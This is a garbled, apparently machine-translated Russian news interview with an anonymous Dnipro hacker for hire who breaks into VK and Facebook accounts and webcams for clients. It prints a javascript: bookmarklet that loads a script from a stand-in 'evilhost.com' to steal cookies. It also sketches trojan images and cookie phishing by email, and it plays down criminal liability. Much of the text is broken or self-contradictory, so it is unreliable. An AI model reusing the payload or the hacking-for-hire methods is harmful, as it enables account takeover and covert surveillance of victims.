Ктo из нaс нe вoсxищaлся в кинo? Смeлыe, oчeнь умныe дeти, кoтoрыe всe, чтo мoгут oбвeсти вoкруг пaльцa aбсoлютнo никaкoй. Жизнь рeaльныx xaкeрoв oчeнь oтличaeтся oт oригинaлoв нa экрaнe. Oни пoльзуются «чeрный Google» и TOR, нo нe стoит oстaнaвливaться нa зaрaбoтки зa взлoм стрaницы «Вкoнтaктe». Гeрoй этoгo мaтeриaлa пoжeлaл oстaться aнoнимным (кaк и oжидaлoсь), тaк чтo услoвнo будeм нaзывaть eгo Мaкс.

Мaкс – кoрeннoй днeпрянин. В 2010-oм oн oстaвил рaбoту в крупнoй IT-кoмпaнии, кoгдa я пoнялa, чтo в oдин взлoм сoциaльныx стрaниц мoжнo зaрaбoтaть нe мeньшe, и этo гoспoдь врeмeни. Пaрeнь рaсскaзaл Vgorode, чтo чaстo прoсят взлoмaть и скoлькo этo стoит.

Вoйдитe в кaмeру и взлoмaть чужую стрaницу ВК — лeгкo

С кaкиx рaбoт тeбe чaщe всeгo oбрaщaются?

Oбычнo прoсят, чтoбы имeть дoступ в другую кaмeру нa нoутбукe или взлoмaть стрaницу в «Facebook». Пaрaдoкс нaшeгo врeмeни высoкиx тexнoлoгий в тo, чтo зaщитит вaс oт нaблюдeния «вeбкe» мoжeт быть тoлькo один пластырь в ячейке.

Войдите с камеры в ноутбук как вы можете с помощью специальных программ, так и вручную. Для этого вам нужно будет создать один исполняемый файл, и «заразить» ваш компьютер. Это может быть сделано, например, через удобный с первого взгляда jpg изображение. Информация, как это сделать вы можете найти еще и на форуме. Правда, большинство людей не знает, где ее найти и проводится в псевдообучающие видео в ютюбе. Там показывают абсолютный бред. С ІР-адрес рубить «вебку» не может быть. Для того, чтобы защитить себя от наблюдения, не открывать вложения в письма и сообщения, которые приходят от иностранных. «Троянский конь» — по-прежнему самый распространенный способ попасть в чужой компьютер.

Заходишь на ту страницу в «ВК» может быть, если заставить жертву перейти на фейковую страницу. Например, вы можете предложить ввести в поле поиска конкретного сценария (программа, написанная на одном из языков программирования). Большинство людей не заподозрят. Это может быть сделано даже на странице клиента, который мальчик/девочка «жертвы».

Подобный сценарий может выглядеть так:

  javascript:var sc=document.createElement(‘script’);sc.src=’http://evilhost.com/scripts/evilscript.js?nz=’+Math.random();document.body.appendChild(s);void(0);

Пользователь может сказать, что, нажав на ссылку, вы можете скачать хорошая песня. И в это время, злоумышленник может проанализировать файлы cookie.

Поэтому, не введитесь на это. И если вы хотите кого-то взломать, ни в коем случае не нажимайте на ссылки в Интернете, которые обещают чудесную программу. С vk.com не жесть «брут форсы» (спец.программы для взлома) с использованием утилит жесткого перебора паролей. Уже после третьей неудачной попытки включается «captcha».

Конечно, взлом влечет за собой уголовную ответственность, но не знаю никого, кто отлавливал хакер что-то подобное. На самом деле, это мелочь на уровне государства. Никто не заботится. Банки не грабить.

Что нужно сделать, чтобы не попасть в взломщику на крючок?

Гарантия от взлома. Есть хороший совет: следите, чтобы адрес, на который можно перейти (если в адресной строке изменить, по крайней мере 1 букву – это, безусловно, ловушка), не открывать непонятные файлы и не отвечайте на подозрительные сообщения электронной почты. Пароли лучше выбрать в качестве бессмысленных наборов букв и цифр (не менее 8 символов). Так что не взломали «голыми руками». Есть специальные программы, которые производят всевозможные комбинации букв и цифр. Но если использовать, для взлома страницы, потребуются годы.

Страницы взламывают для проверки, во-вторых половина

Сколько платить для взлома социальных страниц?

5-6 тысяч гривен. В месяц я получаю 2-3 заказа. Нормальные. Хотя, если уже говорить честно, я не понимаю, почему людям это нужно. Все хотят контролировать своих детей, девочек, женщин, мужчин… Но если человек активно с кем-то общается, то можно вычислить и без краж. Не так ли? Кстати, последний год, за аналогичные услуги обращается почти в два раза меньше, чем людей. Наверное, кризис.

Как клиенты тебя находят?

Через форум. В Интернете многие. Настолько, что решил воспользоваться «помощью из-за рубежа», должны быть очень осторожны. Бросили на форуме. Лучше общаться только в проверенных сайтов. Часто это не замечательные форумы с такими названиями, как «Программа по географии для 8 класс», «Вышивка крестом для детей» и т. д. Когда откроется ваш сайт, бросается в глаза, до ужаса банальная переписка в данной теме, но стоит его открыть, временно версию страницы, и вы можете прочитать много интересных вещей. Часто в таких форумах используют шифрование, но без ключа все диалоги выглядят как обмен много бессмысленных фраз. Чтобы попасть на такой сайт, нужен кто-то.

Не жалеешь, что ушел с постоянной работы на незаконное неполный рабочий день?

Нет. Когда ты работаешь в крупной компании 5 дней в неделю с 9 до 9, время жить вообще. Ты просто один из десятки роботов, которые кодят на большого дядю. Вот фриланс-это другое. Сегодня многие дети проводят краткие курсы в тех же тестеров и горя не знают. Если и создается впечатление, что скоро тестеров будет больше, чем разработчиков.

«Черный интернет» – это ад, который никто не может остановить

Сегодня многие говорят о «черном Интернете». Что это? Существует?

Да, это так же реально, как и в обычной сети. Параллельный Интернет не видят поисковые системы Яндекс, Google и т. д. Доступ к множеству сайтов возможен только через цепочку зашифрованных соединений – TOR-сеть, узлы, которые разбросаны по всему миру. Все соединения анонимны, проложить новый маршрут можно в любой момент. Для TOR говорят, что она состоит на 99% из троллей, хакеров, любителей проституции и агентов ФБР.

Изначально это было что-то вроде закрытой сети, для армии, но затем каким-то образом «просочилась» и ТОР идут торговцы оружием, торговцы людьми и извращенцы. На самом деле в голове не укладывается, что буквально в одном клике от известных нам «всемирной паутины» процветает «ад», и никто не в состоянии, чтобы действительно остановить. Сегодня этот «ад» работает в основном на английском, но и наши соотечественники туда визиты.

Реальные хакеры, как один из тех парней, которые «ломаются» Пентагон в боевиках?

На экране хакеры работают больше, чем действительно кого-то «ломают». Если для тебя уже кто-то активно начал охотиться, что-то, чтобы скрыть, как фильмы, уже вряд ли получится. Это в представлении голливудских режиссеров, каждый хакер десятка друзей с пулеметами и джип, которые готовы умереть, только для того, чтобы ты, не плохо. В реальной жизни, играть с «большими дядями» это опасно, гораздо безопаснее сделать что-нибудь мелочью, как взлом страницы в «ВКОНТАКТЕ».

Кстати, для взлома Пентагона… сми любят писать о молодых хакерах, взламывающих «такие серьезные системы». В результате, получается, что юный гений только дает список сотрудников Пентагона. Ребята, это может сделать любой с помощью поисковой системы, несмотря на то, что сайт является безопасным. По умолчанию, слова и вообще любые введенные символы Google ищет все файлы проиндексированных страниц. Чтобы сузить диапазон поиска, вы домена верхнего уровня, определенное место или положение в нужную очередь в файлы. Тема всегда представляют собой украденные данные в определенную практическую ценность.

Какой совет дашь нашим читателям, чтобы избежать судьбы сайта Пентагона?

Менее вы размещаете свои личные данные. Я советую не сообщает, семейное положение и возраст в социальных сетях, не выкладывают фотографии со своими близкими. Кроме того, избегайте использовать сайт» под изображением. Конечно, это очень хорошо, что мы едем в Египет, но до сих пор вы не дома, знать никто не должен.

Также, лучше менять никнэймы на форуме и веб-сайтов. Например, кто-то рассчитывает, что вы всегда можете подписаться с названием «любочка129″, я нашел форум, где вы можете сидеть сложа руки и знать, что вы в последнее время задумывались, в какой-то портал, где дешевле купить сапоги угги. Достаточно написать на почту письмо от имени администратора форума, с просьбой ответить на некоторые невинные вопросы («Что угги вам интересны: серый или зеленые?») и «cookies» в ответ имейлу. Таким образом, вы можете получить доступ к «почтовому ящику», а затем в учетные записи в социальных сетях. В общем, лучше перестраховаться, чем потом сожалеть.

Будьте в курсе последних новостей, подпишитесь на канал Vgorode в Телеграмму и наши группы в Вконтакте и Facebook.